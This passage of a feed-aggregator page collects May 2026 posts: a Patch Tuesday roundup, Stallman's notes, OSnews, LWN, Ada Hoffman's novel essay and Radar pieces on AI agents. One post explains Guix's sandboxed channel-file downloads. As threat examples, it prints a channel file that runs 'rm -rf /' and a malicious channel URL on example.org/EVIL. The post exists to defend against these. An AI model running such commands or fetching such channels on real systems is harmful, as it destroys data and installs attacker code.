Wednesday, 13 May

10:28

The airplane oath [Seth's Blog]

You’re flying over Mount Ranier and a hole opens up in the bottom of your airplane. In that moment, you think hard about what you’ve done, what you’re doing, and what matters.

My friend Ty actually had this happen. In that moment, she decided to stop wasting her days on a career that pleased her family, and committed, if she survived, to quit and go build something that mattered to her.

Of course, in the months that followed, honoring the commitment was hard. If it were easy, she would have done it far sooner.

But it’s an oath. The sort of promise you don’t negotiate.

The really cool thing is that you don’t need to avoid a possible plane crash to wake up, see what’s going on in your life and take an oath. You can do it simply because it’s May 13th.

What a chance we each have. To take agency, to make a deal and to honor it. Don’t wait for an excuse to care enough to take an oath. Simply begin.

08:49

The Myriad [Penny Arcade]

New Comic: The Myriad

06:21

Girl Genius for Wednesday, May 13, 2026 [Girl Genius]

The Girl Genius comic for Wednesday, May 13, 2026 has been posted.

Tuesday, 12 May

23:56

Wheat crop failure in US [Richard Stallman's Political Notes]

Global heating has created a wheat crop failure in the US. *Temperature swings have left crops across the Plains in terrible conditions, with some farmers opting not to harvest.*

If we don't curb global heating, this will happen more and more often.

The nocebo effect is real [Richard Stallman's Political Notes]

The nocebo effect is real, just like the placebo effect.

According to one study, the nocebo effect seems to be responsible for around 3/4 of negative reactions to Covid-19 vaccine.

One LLM good at finding exploits in software [Richard Stallman's Political Notes]

Reportedly one LLM is very good at finding exploits in software. People will need to fix them.

Another future LLM may be very good at finding exploits in tax systems. People will need to fix them, too.

UK nationalizing train operating companies [Richard Stallman's Political Notes]

The UK is really nationalizing the train operating companies, reversing one disastrous ideological decision made by the Tories decades ago.

Iranian human rights activist memoir [Richard Stallman's Political Notes]

Narges Mohammadi, Iranian human rights activist, wrote a memoir which describes beatings, solitary confinement, and denial of medical treatment. She is dying in prison, and those cruel state actions are part of the cause.

I wonder why the US persecutor hates the Iranian persecutors so much, given that he seems to be just fine with Russia's persecutor. He surely does not care any more about Iranian's human rights than about Americans' human rights. Perhaps this reflects Netanyahu's influence on him; perhaps he hates Iran's rulers because they persistently organize Shi'ites to oppose Israel on behalf of Palestinians.

Pardoned January 6 rioter sentenced for burglary [Richard Stallman's Political Notes]

*Pardoned January 6 rioter sentenced to seven years for Virginia burglary.*

The bullshitter launched the mob at the Capitol after preparing them with violent hatred, and arranged to make armed support hard for the Capitol police to obtain. In 2025, he pardoned all those who had been convicted for participating in the attack. There is no reasonable doubt that he arranged the attack intentionally and considers it an act of support for him. Justice calls for him to be convicted of the attack and sentenced to prison.

Datacenter planning documents mislead on greenhouse gas emissions [Richard Stallman's Political Notes]

Google datacenter planning documents misleadingly minimized the projected greenhouse gas emissions by a factor of five.

23:49

23:42

Link [Scripting News]

I have regained control of my Twitter account. I really missed it, truth be told. Thanks to Scoble for helping here. As he so often has.

23:35

Patch Tuesday, May 2026 Edition [Krebs on Security]

Artificial intelligence platforms may be just as susceptible to social engineering as human beings, but they are proving remarkably good at finding security vulnerabilities in human-made computer code. That reality is on full display this month with some of the more widely-used software makers — including Apple, Google, Microsoft, Mozilla and Oracle — fixing near record volumes of security bugs, and/or quickening the tempo of their patch releases.

As it does on the second Tuesday of every month, Microsoft today released software updates to address at least 118 security vulnerabilities in its various Windows operating systems and other products. Remarkably, this is the first Patch Tuesday in nearly two years that Microsoft is not shipping any fixes to deal with emergency zero-day flaws that are already being exploited. Nor have any of the flaws fixed today been previously disclosed (potentially giving attackers a heads up in how to exploit the weakness).

Sixteen of the vulnerabilities earned Microsoft’s most-dire “critical” label, meaning malware or miscreants could abuse these bugs to seize remote control over a vulnerable Windows device with little or no help from the user. Rapid7 has done much of the heavy lifting in identifying some of the more concerning critical weaknesses this month, including:

  • CVE-2026-41089: A critical stack-based buffer overflow in Windows Netlogon that offers an attacker SYSTEM privileges on the domain controller. No privileges or user interaction are required, and attack complexity is low. Patches are available for all versions of Windows Server from 2012 onwards.
  • CVE-2026-41096: A critical RCE in the Windows DNS client implementation worthy of attention despite Microsoft assessing exploitation as less likely.
  • CVE-2026-41103: A critical elevation of privilege vulnerability that allows an unauthorized attacker to impersonate an existing user by presenting forged credentials, thus bypassing Entra ID. Microsoft expects that exploitation is more likely.

May’s Patch Tuesday is a welcome respite from April, which saw Microsoft fix a near-record 167 security flaws. Microsoft was among a few dozen tech giants given access to a “Project Glasswing,” a much-hyped AI capability developed by Anthropic that appears quite effective at unearthing security vulnerabilities in code.

Apple, another early participant in Project Glasswing, typically fixes an average of 20 vulnerabilities each time it ships a security update for iOS devices, said Chris Goettl, vice president of product management at Ivanti. On May 11, Apple shipped iOS 15, which addressed at least 52 vulnerabilities and backported the changes all the way to iPhone 6s and iOS 15.

Last month, Mozilla released Firefox 150, which resolved a whopping 271 vulnerabilities that were reportedly discovered during the Glasswing evaluation.

“Since Firefox 150.0.0 released, they have been on a more aggressive weekly cadence for security updates including the release of Firefox 150.0.3 on May Patch Tuesday resolving between three to five CVEs in each release,” Goettl said.

The software giant Oracle likewise recently increased its patch pace in response to their work with Glasswing. In its most recent quarterly patch update, Oracle addressed at least 450 flaws, including more than 300 fixes for remotely exploitable, unauthenticated flaws. But at the end of April, Oracle announced it was switching to a monthly update cycle for critical security issues.

On May 8, Google started rolling out updates to its Chrome browser that fixed an astonishing 127 security flaws (up from just 30 the previous month). Chrome automagically downloads available security updates, but installing them requires fully restarting the browser.

If you encounter any weirdness applying the updates from Microsoft or any other vendor mentioned here, feel free to sound off in the comments below. Meantime, if you haven’t backed up your data and/or drive lately, doing that before updating is generally sound advice. For a more granular look at the Microsoft updates released today, checkout this inventory by the SANS Internet Storm Center.

23:00

Link [Scripting News]

This bit of code kept coming up, so I wanted to make it easier to find.

22:14

The anti-minimalist backlash is the bigger story behind Oxygen’s revival [OSnews]

A few weeks ago, we talked about a project within KDE to revive two of their classic themes, Oxygen and Air, and polish them up to make them usable on the current versions of KDE. The developers and designers working on this project say they’ve been utterly surprised by just how popular this news has proven to be, and Filip Fila published a blog post with some thoughts on this unexpected popularity. Why are people yearning so strongly for user interfaces from the past?

That’s the real story underneath the retro-yearning. It isn’t a simply story of people wanting their childhood from the 2000s back. It’s that a lot of ‘the new’ we’ve been offering doesn’t satisfy. It doesn’t have personality. It doesn’t feel warm. It doesn’t feel like it was made with the idea of being anything more than a clean product that gets the job done. The escapism towards the past is a symptom. A symptom of unmet needs, not mere sentimentality.

↫ Filip Fila

Fila uses modern architecture as an example, and I think it’s an apt one. While monumental modern architecture can easily be beautiful and striking, it’s the mundane buildings all around us that just don’t seem to elicit any positive emotions, no sense of belonging or safety. As Fila also notes, the decades-long swing to minimalism in both architecture and UI design isn’t merely because of a preference among designers, but also because minimalism is a hell of a lot cheaper to produce. A building with very little ornamentation and basic, straight lines is much easier, and thus cheaper, to design, construct, and maintain. The same applies to graphical user interface design.

There are some signs that the pendulum is starting to swing back towards more instead of less, in all aspects of design. More and more people are loudly demanding buildings to adopt more classical elements, and as we can all attest to here on OSNews, the longing for aspects of UI design from the ’90s and early 2000s to make a return is strong. And not just among us deep in the weeds, either; I’ve lost count of the number of times I’ve seen normal people utterly confounded by modern UI design.

Anyway, bring back beveled edges.

21:28

05/12/26 [Flipside]

1 week left in my Kickstarter! Still trying to raise as much as I can for the next volume of my graphic novel! You can order any of the books!

https://www.kickstarter.com/projects/1016357068/flipside-graphic-novel-13th-volume

Google gives early peek at Android laptops: Googlebooks [OSnews]

The news that Google is working to move Chrome OS to the Android technology stack, and that it wants to start putting Android on laptops, is not exactly news, as the company has been talking about it for years. At an Android event today, the company finally unveiled the culmination of all this work: Googlebooks.

We’re bringing together the best of Android, which comes with powerful apps on Google Play and a modern OS that’s designed for Intelligence, and ChromeOS, which comes with the world’s most popular browser. The result is Googlebook: a new category of laptops built with Gemini’s helpfulness at its core, designed to work seamlessly with the devices in your life and powered by premium hardware. We’re sharing a sneak peek into the Googlebook experience today and will have a lot more to share later this year.

↫ Alex Kuscher at The Keyword, a Google blog apparently

The approach here seems very similar to Chromebooks, with Googlebooks being designed and built by various OEMs, but instead of Chrome OS they run Android in desktop mode. Of course, “AI” has been creamed all over these things, to the point where not even the venerable mouse cursor is safe: if you wiggle your cursor, it will turn into “Magic Pointer”, which will highlight various “AI” actions as you hover over stuff on your screen. Google also showed off an “AI”-based feature to create widgets, as well as the ability to access files on your phone right from a Googlebook.

That’s about all we know as far as functionality and features goes. They’re supposed to go on sale later this year, with models coming from Acer, ASUS, Dell, HP, and Lenovo.

21:21

I Didn’t Even Know American Wisteria Was A Thing [Whatever]

Spring is in full swing here in Ohio and it has been both very beautiful and very allergy-inducing. One of the more beautiful aspects is that there is apparently a ton of American Wisteria wrapped around my pergola by the garage, and I find it to be extremely pretty. See for yourself:

A beautiful blossom of the American Wisteria, purple and clustered together into almost hydrangea like shapes.

This particular bloom is more open and blossomed than the others, hence why I took its photo. Before they bloomed, they all looked like tiny purple pinecones. I had no idea that they would open up into these beautiful flower clusters. I’m absolutely thrilled these are wrapped completely around my pergola. I notice their beauty every time I leave my house.

Very grateful to have some pretty purple flowers around.

Have you seen American Wisteria before? Perhaps you’ve seen the wisteria in Japan before? Let me know in the comments, and have a great day!

-AMS

20:42

05/12/26 [Flipside]

1 week left in my Kickstarter! Still trying to raise as much as I can for the next volume of my graphic novel! You can order any of the books!

A HREF="https://www.kickstarter.com/projects/1016357068/flipside-graphic-novel-13th-volume">https://www.kickstarter.com/projects/1016357068/flipside-graphic-novel-13th-volume

19:07

[$] Using dma-bufs for read and write operations [LWN.net]

The kernel's dma-buf subsystem provides a way for drivers to share memory buffers, usually in order to support efficient device-to-device I/O. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, Pavel Begunkov, assisted by Kanchan Joshi, led a joint session of the storage and memory-management tracks to explore ways to make the use of dma-bufs more efficient yet, and to make them available for read and write operations initiated by user space.

18:21

17:35

Link [Scripting News]

Expanding items on a FeedLand blogroll should be consistently fast now. Just switched to a different server on the backend.

Burnout and Cognitive Debt [Radar]

Steve Yegge’s article about programmer burnout (“The AI Vampire”) along with Margaret Storey’s article about Cognitive Debt started an ongoing conversation about programmer fatigue and software quality—two topics that should be linked, but often aren’t. Steve argues that programming constantly with the help of agentic AI leds to burnout; it’s fast, it’s fun, but keeping up with your agents causes mental strain. He recommends programming with agents no more than 4 or 5 hours per day. I could cynically say that most software developers spend at most 20% of their time writing code, which leaves about an hour and a half for wrestling with agents—but that’s beside the point. Yegge’s point about burnout is important, and is in line with what friends have told me. At some point, you have to put the laptop down.

Storey makes a different point. Agentic engineering is great at creating software that works, but that you don’t quite understand. Like humans, agents can generate a lot of spaghetti code. They can “design” convoluted and inappropriate software structures—I hesitate to call them “architectures”; they’re what happens in the absence of architecture. Agents are very capable of creating technical debt—and not the kind of meaningful technical debt that lets you release a product on time with the knowledge that you need to make pay it back with interest. If nobody is looking hard at the code, the debt can grow without bounds, sort of like not checking your credit card balance. What’s worse—and this is Storey’s contribution—while that technical debt is growing, developers are losing track of the design, the structure, the architecture. She calls that “cognitive debt.” You don’t just have problems in the code; those problems are harder to find and fix than they should be because you’re unclear on the structure of the code you’re working with.

Other voices have made similar points. The Sonarsource blog writes about how AI is reshaping technical debt and creating new burdens, new kinds of toil. In “The Mythical Agent Month,” Wes McKinney links the problem of burnout to the introduction of “accidental complexity” and “agent scope creep,” while Tim O’Brien writes that while scope creep isn’t new, AI supersized its growth. And Addy Osmani writes about finding your parallel agent limit, coming to grips with what you’re capable of accomplishing without compromising your work or your life.

Cognitive debt and burnout aren’t new, alas. With or without AI, we’ve all stayed up to 4AM working on a bug that won’t go away or pursuing an interesting idea to its end. Sometimes that’s heroic, but AI threatens to turn it into a lifestyle. AI fatigue is real, as Siddhant Khare writes, and it’s something we need to talk about. When fatigued, it’s tempting to say “this works, it looks good, and it passes our tests” without considering how the code fits into the overall plan. With 10x code generation, you also get 10x the debt load, and that’s being optimistic. When the debt curve goes exponential, strategies for managing that debt are stressed past the breaking point.

The problem with cognitive debt is that it eventually makes new features and bug fixes difficult or impossible. The code has become so convoluted that it can’t be changed. I’ve certainly done that with hand-written code: added a feature without thinking enough about how the new code fit in, added some more code later, and then—when I needed to add a third feature—discovered that I’d created a problem that wouldn’t be simple to fix. The right stuff was there, but in the wrong places because I wasn’t thinking about the overall structure.

That’s a common enough problem with handwritten code; it’s almost always a problem with legacy code where the original developers and maintainers are no longer around. We need to realize that it’s also a problem with AI-generated code, which has been characterized as legacy code from the day it’s written. Somebody or something has to pay down the debt. As Storey writes, “velocity without understanding is not sustainable”: not for humans, not for machines. If you understand the structure of what you’re building, you can steer the AI away from creating a problem in the first place, or you can use it to author a fix. If you don’t understand the structure or can’t describe it to the AI, you’re lost.

Cognitive debt accumulates much more quickly when you’re burned out. Burnout has always been a problem for programmers, especially for those who really love programming: you stay up all night to solve a problem. And, while some programmers resist using AI to write code, those who use AI frequently find that it exacts the same toll: it’s hard to stop. It is its own kind of toil: toil that gives you a sense of accomplishment and fulfillment, but still leaves you empty.

Agents may not be subject to burnout, but the humans who control them are. Agents are quickly becoming more capable, but they still can’t maintain a sense of the shape and structure of a project over the long term. That’s our job. They can pay down technical debt, but only if properly guided; that’s also our job. And we won’t be able to do either if we’re burned out.

16:56

The Big Idea: Ada Hoffman [Whatever]

When it comes down to it, all humanity really has at the end of the day is our stories. Telling stories around the fire is a tale as old as humans themselves, and author Ada Hoffman expresses the importance of these stories, and the importance of being human, in the Big Idea for their newest novel, Ignore All Previous Instructions.

ADA HOFFMAN:

When I tell people the premise of Ignore All Previous Instructions, they often remark how it reminds them of real life these days. In Ignore, the characters live in a space colony on Callisto where a generative AI company owns everything – and where making art or telling stories, without the AI’s assistance, is strictly not allowed.

Certainly there are parallels between this dystopian premise and my life in 2026 – working as an adjunct for a university computer science department where the people in charge keep yelling about the “pivot to AI” and how terrible it will be if we don’t all get on board.

But I wrote Ignore in 2023.

Publishing is slow, and novelists write about current events at our own peril. In 2023, I could see which way the tech industry hype train was going, but there was no way to know if it would still be going that direction three years later. I hoped it wouldn’t be. I decided to write the story anyway and see how it landed, because the topic was so close to my professional expertise and so close to my heart.

Another part of the novel, even closer to my heart and equally timely, was the problem of queer self-expression and book bans.

In 2023, I was at an early stage in therapy. I was just starting to think back, in ways I hadn’t allowed myself before, about how some of my experiences growing up had shaped me. This included a lot of things, many of them not germane to this post, but it also included the experience of growing up queer without understanding that that’s what it was.

My gut told me that I needed to write about these experiences – more urgently than I had ever needed to write about anything before.

In 2023, we were already seeing book bans and “Don’t Say Gay” laws. I didn’t know if that trend was going to continue for three years, either. I hoped it wouldn’t. But I couldn’t help but look at that news and think of my own childhood. I eventually did find words and concepts for what I was experiencing, although not necessarily in the healthiest way. The generation after me was given so much more, in terms of words and ways of understanding themselves. It galled me to see reactionaries trying to take that away from them again.

When I put these two urgently emerging problems together, I could see that they had one big thing in common. They were both, at heart, about the deep human need to express one’s own feelings – and a powerful movement that threatened to take it away.

AI writing is not an expression of the genuine heartfelt thought or experience of a human. If it is carefully prompted to express a human’s heartfelt thought, then the thought comes from the human, not the AI. Research shows that, the longer we use a generative AI, the less our own thoughts enter into it; instead, offloading our thinking onto an AI causes our own capacity for independent thought to atrophy. Given the fervor and urgency with which tech companies urge us to use AI for everything, one might be forgiven for suspecting that this atrophy is their goal.

Moreover, because it’s trained to predict the most likely continuation of a set of words, AI writing will always converge toward the most mainstream or most common way of looking at something. The mainstream of the training data – essentially, the whole Internet, plus all the published books that the tech companies could find – is not queer. Even without any deliberate censorship, the perspectives of queer people and other minoritized groups are less likely to be considered in an AI’s output. For the same reason, if the AI is deliberately prompted to represent a queer perspective, it will rely on broad averages and stereotypes – not the lived and felt experience of an individual human who is queer.

But in hard times like these, independent thought based on our own lived experience is exactly what we need. This is the skill that helps us to understand when something is not quite right, or doesn’t quite match the truth of our lives – whether it’s a structural injustice or something personal.

Ignore All Previous Instructions tells the story of characters who grow up caught in a system where their own thoughts and voices are not valued, and who find ways – determinedly and imperfectly – to tell their own stories regardless. If there’s one idea readers take away from the book, I hope it’s the beauty and power of storytelling in our own words – and the need to hold on to it in the face of an establishment which would rather our stories weren’t told.


Ignore All Previous Instructions: Amazon|Barnes & Noble|Bookshop

Author socials: Website|Bluesky|Facebook

Read an excerpt.

16:49

16:00

Link [Scripting News]

Masto, Twitter: I'd like to come up with a list of formats, protocols and products that have become defaults for AI work.

14:35

Time travel without borders [Planet GNU]

When offered the option to run other people’s code, a prime consideration is often ease of deployment. While much progress has been made in support of rapid deployment, the security implications of those quick deployments is often overlooked. In this post, we look at a new feature of guix time-machine and guix pull in support of one-line deployment commands: the ability to download channel files, but without compromising on security.

Sharing code

The normal workflow to share software and make it easily deployable with Guix goes like this: someone puts their packager hat on and writes a package definition, adds it to Guix proper or to a separate channel, at which point anyone can fetch the relevant channel(s) and deploy the software.

As an example, let’s assume you want to run yt-dlp as packaged in the latest Guix revision without upgrading your system or going through an explicit installation step. The simplest way to do that is with this command:

guix time-machine -q -- shell yt-dlp -- yt-dlp …

If you’re familiar with Nix, this is equivalent—with some important differences we’ll discuss below—to this command:

nix shell nixpkgs#yt-dlp --command yt-dlp …

In both cases, we’re fetching the latest revision of the package collection (the master branch for Guix, the nixpkgs-unstable branch of Nixpkgs for Nix) and running yt-dlp from there. (nix run goes one step further by removing the need to specify the command name.)

Now, that was an easy example because yt-dlp comes from Guix itself. What if you’d like to deploy an application that’s in another channel such as Guix-Science? Well, you would first need to come up with a channels.scm file for Guix-Science and then you can pass it to guix pull or guix time-machine:

$EDITOR channels.scm
# Make sure that includes Guix-Science.
guix time-machine -C channels.scm -- shell …

If you’re lucky, perhaps you can download a channel file. For example, Cuirass produces them for all successfully-evaluated commits, so you can fetch one for Guix-Science and go from there:

wget -O channels.scm \
  https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
guix time-machine -C channels.scm -- shell …

You can even do it in a single command using Bash process substitution!

guix time-machine \
  -C <(wget -O https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science) \
  -- shell …

Is it a good idea though?

The threat

If you look more closely, the nix shell command and the last two guix time-machine commands have a bit of a curl | sh flavor to it: downloading arbitrary code and running it without further ado. All nix shell does is authenticate github.com, through HTTPS, and likewise for wget—that you’re downloading from the genuine github.com doesn’t tell you anything about the trustworthiness of the code you’re running.

In the case of Guix, the channels.scm you’re downloading could very well read this:

(system* "rm" "-rf" "/")  ;uh-oh!

Here system*, as you might have guessed, invokes a command. Because yes, channel files can contain arbitrary Scheme code! (It’s worth noting that this particular problem is one Nix doesn’t have: Nix being a domain-specific language (DSL) already limits what Nix code can do, especially with so-called “pure� evaluation.)

Or it could read something like this:

(list (channel
        (name 'guix)
        ;; This is Mallory’s malicious Guix, now you’re PWND!
        (url "https://example.org/EVIL/guix.git")
        (branch "master")
        (introduction
         (make-channel-introduction
          "badc0ffeed807b096b48283debdcddccfea34bad"
          (openpgp-fingerprint
           "DEAD CABB A99E F6A8 0D1D  E643 A2A0 6DF2 A33A BADD")))))

In this case, the channel file looks good, but the channel you’ll fetch—probably not so much.

So no: downloading a channel file and using it without checking it is not reasonable.

The cake

Can we have our cake and eat it too? Can we casually download someone else’s channel file without putting our system at risk?

Changes that have just landed in guix pull and guix time-machine aim to address these seemingly contradictory needs. The two commands are now equipped to download by themselves: just pass them a URL with the -C (or --channels) option.

guix time-machine \
  -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master \
  -- …

Crucially, this command is not equivalent to the naïve -C <(wget -O …) trick we saw above.

First, channel code is now evaluated in a “sandbox�: it can only access a predefined set of bindings, cannot import additional modules, and it must run in a limited amount of time and with a limited amount of memory allocated. This still provides access to many general-purpose facilities but blocks anything that could be used to alter the system state, exfiltrate data, or cause a denial of service.

With this in place, evaluating a channel file can be considered safe. Now, one problem remains: the file might list channels that I as a user do not trust. And here we see a tension between fetching channel files from out there and keeping one’s system safe. To address that, we define a new rule: only trusted channels may be deployed; if a channel file lists untrusted channels, guix pull and guix time-machine error out. Trusted channels are defined as follows:

  • they are those listed in ~/.config/guix/trusted-channels.scm, if it exists—this file lists channels just like a regular channel file;
  • or, they are the channels currently in use, as returned by guix describe.

This brings us to the interesting question of channel identity. This channel I call guix-science in my trusted-channels.scm, someone else might as well call it Guix-Science or science; how can I tell if we’re dealing with the channel that I call guix-science and that I trust?

The key insight is that the name itself doesn’t matter; the element that does matter is the “introduction� of the channel—the piece of information that tells how to authenticate updates of that channel. If you forgot that episode, the introduction the thing with hexadecimal strings that appears in a channel specification:

(channel
  (name 'guix-past)
  (url "https://codeberg.org/guix-science/guix-past")
  (introduction   ;this hex soup 👇 is the channel’s identity
   (make-channel-introduction
    "0c119db2ea86a389769f4d2b9c6f5c41c027e336"
    (openpgp-fingerprint
     "3CE4 6455 8A84 FDC6 9DB4  0CFB 090B 1199 3D9A EBB5"))))

Two channels with the same introduction are one and the same. Thus, if my trusted-channels.scm contains a channel with the above introduction, pull and time-machine will happily pull from it.

The corollary is that a channel that cannot be authenticated—i.e., that lacks the introduction field—cannot be considered a trusted channel.

Overall, this “trusted channel� rule trades flexibility for safety. It’s a tradeoff but one that looks like a better default than anything that effectively amounts to arbitrary code execution à la curl | sh.

The party

“Why would I want to download channel files?�, you may ask? Here’s a list of typical use cases we have in mind.

The first one is downloading a channel file from a continuous integration system—to deploy from a known-good state, to test a new package version or a new feature, to reproduce a bug, etc. Cuirass serves channel files for every channel set it evaluates. So for example, you can pull the latest Guix channel that was successfully evaluated like this:

guix pull -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master

Likewise, this is how you’d travel to the latest Guix-Science channel and dependent channels to execute RStudio:

guix time-machine \
  -C https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
  -- shell rstudio -- rstudio

A second, similar use case is one-line commands for demos: if you’re developing an application, you can package it, publish a channel file, and share a time-machine command to spawn it. With pinned channels, you can ensure users run it from a known-good state.

A third use case that is emerging is channel releases. Teams maintaining third-party channels might want to tag releases of their channel as a channel files where each channel is pinned. This is what the Guix-Science project recently decided to do.

In the same vein, a fourth use case is the publication of a tested channel file that a whole team, or a whole fleet of computers, would upgrade from. Imagine a group of people responsible for testing who would periodically publish a new channel file pinned to known-good commits that all the team members or an entire fleet could safely pull from—it could even be used for unattended upgrades!

The fifth use case is reproducible research. A computational workflow can be captured by two files: channels.scm and manifest.scm. In some cases, we might as well download the channel file.

Dissonance?

But wait… the astute reader might have felt some dissonance: downloading a channel file to set up a supposedly reproducible workflow? That can’t be right: the channel file could change over time, or it could vanish from its original URL. That’s not reproducibility, is it?

As Simon Tournier was prompt to suggest, the solution is to support SWHIDs (Software Hash Identifiers) in addition to URLs. A SWHID is essentially a standardized content hash that uniquely identifies “content�—raw data or structured data such as directories and version-control revisions. If you followed along, you might remember that Guix is connected to the Software Heritage archive. Software packaged in Guix is in the archive and so all we had to do is connect the dots.

Consider this command:

guix time-machine \
  -C swh:1:cnt:003e1e0c1b9b358082201332c926ae54e9549002  \
  -- …

It downloads the channel file identified by the given SWHID and then proceeds.

The SWHID serves as an unambiguous and unique content address to refer to a specific channel set. It can be computed using guix hash, but of course, the channel file must first be present in the Software Heritage archive. Thus, if the file is part of a version-control repository, you can first request archiving of that repository. In a research paper, one may include a single command to re-run computations the paper builds upon.

Pleasurable

This new addition felt pleasurable for several reasons. First because it addresses use cases that people had been talking for a while, and it’s always nice to fill gaps. It also felt good because several design choices complement each other so that everything here falls into place: channel specifications, Guile’s “sandboxing�, channel authentication, and Software Heritage integration.

The whole endeavor—allowing for quick deployment without compromising on security—might sound quixotic or, some might say, anachronistic, at a time when the pips, the npms, the snaps and many more are all about deploying software of unknown origin like there’s no tomorrow. In Guix we do believe that transparency, provenance tracking, and verifiability matter for the software we run; efforts like this one are guided by these principles.

The feature landed just a few days ago. Give it a try and let’s hope you find it pleasant as well!

Acknowledgments

I am grateful to Caleb “Reepca� Ristvedt for their thorough code review and insightful suggestions, and to Simon Tournier for commenting on the general approach and suggesting improvements. Many thanks to Rutherther and to Cayetano Santos for reviewing an earlier draft of this post.

[$] Scaling transparent huge pages to 1GB [LWN.net]

As a general rule, when developers talk about huge pages, they are referring to PMD-level pages that are 1MB or 2MB in size, depending on the CPU architecture. Most CPUs can support other huge-page sizes, though. On x86 systems, PUD-level huge pages hold 1GB of data. Providing such large pages transparently to processes has generally not been considered as either feasible or desirable, but Usama Arif is trying to change that assessment. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, he led a session in the memory-management track on how to make transparent huge pages (THPs) truly huge.

Security updates for Tuesday [LWN.net]

Security updates have been issued by AlmaLinux (freerdp, glib2, libsoup3, and openexr), Debian (dnsmasq, p7zip, p7zip-rar, python-authlib, and rails), Fedora (chromium, firefox, httpd, and nss), SUSE (java-25-openj9, krb5, libmodsecurity3, and mcphost), and Ubuntu (imagemagick, linux, linux-aws, linux-aws-fips, linux-aws-hwe, linux-azure-4.15, linux-fips, linux-gcp, linux-gcp-4.15, linux-gcp-fips, linux-hwe, linux-kvm, linux-oracle, linux-azure, linux-azure-fips, linux-oracle, linux-azure-5.15, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, and linux-raspi).

14:28

Link [Scripting News]

Yesterday I learned about JSONL, and was of course intrigued. It's a really simple thing, even simpler than RSS, and does basically the same thing. And even better, it's the way the AI industry hooks streams together. So If we can get RSS to serve as a source of JSONL feeds, it's possible that the AI industry will find it useful. My goal is to get every standard of the web hooked up to AI, quickly, before the silos realize they're leaving out something important. Once they figure it out, they'll have no choice but to add real RSS support. So I put together a quick demo app that hooks into FeedLand and posts to a JSONL feed new items from one of a small set of feeds I chose basically at random. And here is the JSONL feed. If you're a developer in AI-land could you try reading this into your JSONL-ingesting app, and let me know if I got it right. Here's a place to comment. BTW, that URL is temporary just for this quick demo.

Link [Scripting News]

Good morning sports fans!

1343: Gotta Bounce [Order of the Stick]

http://www.giantitp.com/comics/oots1343.html

13:49

Representative Line: Underscore Its Unimportance [The Daily WTF]

Frequent submitter Argle (previously), sends us a short little representative line. The good news is that this line of code came across Argle's screen during a code review: it was being removed. The bad news is that it was sitting in the code base for ages.

_ = len / 8.0f;

Argle writes:

In a code review today. A co-worker wisely removed the line. Dunno the logic that made anyone write it in the first place.

This is C#, though it could be basically any language. Using _ is one of those little conventions that we use to tell the linter to ignore the fact that this variable isn't used. And this variable was not being used. Of course, in addition to being unused, it's also a puzzle: where does the 8.0f come from? No one knows. Why would we even want the length divided by eight? No one knows. There's nothing about this code that gives any indication that it was a meaningful operation at any point.

No one knows what it does, or why it was there in the first place, but someone put the time into making sure the linter didn't complain about its uselessness by using _ as the variable.

[Advertisement] Keep all your packages and Docker containers in one place, scan for vulnerabilities, and control who can access different feeds. ProGet installs in minutes and has a powerful free version with a lot of great features that you can upgrade when ready.Learn more.

12:56

Gyms for Them, Mirrors for Us [Radar]

Personal AI doesn’t have to run your life to change it. It just must see you clearly and feed your behavior back to you in a way you can’t dodge. Once you look at AI as feedback loops instead of little butlers, the whole “agent” conversation starts to feel upside down.

We’ve overrotated on agents that act and massively underinvested in systems that watch, interpret, and train, for humans and for models.

Stop shipping little butlers

Most personal AI demos orbit the same fantasy: inbox‑zero sidekicks, calendar‑tuning bots, or agents that “just handle it” so you can “focus on what matters.” They’re great on stage but terrible as a risk posture.

The butler model hides a simple asymmetry. A read‑only system that misinterprets you is mildly annoying; you ignore a bad suggestion. A write‑enabled system that misfires in your inbox or CRM is career-limiting. One error is a shrug, the other is an incident report.

That’s the asymmetric agent in one line: Read is cheap; write is expensive. Read can be broad, but write should be narrow, rare, and very hard‑earned. The first, highest‑leverage thing you can build is a mirror: an AI that reads your digital exhaust, synthesizes what it sees, and reflects it back, without ever touching the systems that move money, time, or relationships. Šimon Podhajský’s talk, “Cognitive Exhaust Fumes, or: Read‑Only AI Is Underrated,” is a great example of this pattern in the wild.

This isn’t a temporary sandbox before “real agents.” Treating read‑only as a stepping stone and write as the prize is how you hand a chainsaw to a toddler because they’ve proven they can hold a spoon.

Cognitive exhaust is the real dataset

Your day produces a ridiculous amount of cognitive exhaust: emails half‑written, tabs abandoned, tasks snoozed, articles skimmed, and notes forgotten. Any one stream is noisy. The value appears when you correlate across all of them.

A serious personal AI can sit over multiple sources—mail, calendar, notes, browser history, docs, and CRM—and build a cross‑cutting view of what you do versus what you say you care about. You want it a bit judgmental. You want it to surface things like:

  • Intention–action gaps: projects you “prioritize” but never touch
  • Attention drift: where your time really went
  • Relationship decay: people you insist are key but haven’t contacted in months

Podhajský’s system does exactly this, using a read‑only agent that writes only into its own Obsidian vault—no edits to the original systems, no auto‑emails, just brutally honest reflections and suggested experiments.

Here’s the trap: Your agent must only observe. The moment an agent writes back into the systems it’s monitoring, you’ve poisoned the well. You’re not observing your behavior anymore; you’re observing an AI‑amplified feedback loop. You’ve built an observability rig that forges its own logs. The data stops being “you” and becomes “you plus a stochastic autocomplete with opinions.”

For personal AI, that’s existential. If the whole point is to help you see yourself more clearly, having the same system both author and interpret the traces destroys the value proposition. The mirror starts painting your reflection.

Feedback loops, not party tricks

Seen as feedback loops, the symmetry becomes obvious.

A mirror is a loop targeting your nervous system. The “model” being updated is the human. The exhaust is your digital activity. The environment is your toolchain. The reward shows up as shame, insight, or resolve when you see your week laid bare.

A gym is a loop targeting model weights. The model acts in a world, receives rewards or penalties, and updates its policy. The exhaust is trajectories of prompts, actions, outcomes. The environment is a task harness. The reward is a verifiable signal.

Two different learners, same structure:

  • In the mirror, the user is the learner and the agent is a silent observer.
  • In the gym, the model is the learner and the environment is the judge.

Both are broken for the same reason: We obsess over agents doing flashy things and neglect the quality of the signal that trains the system—human or model. We ship chatty butlers and call it “intelligence” instead of asking, “How clean is the feedback?”

Environments are the new unit of deployment

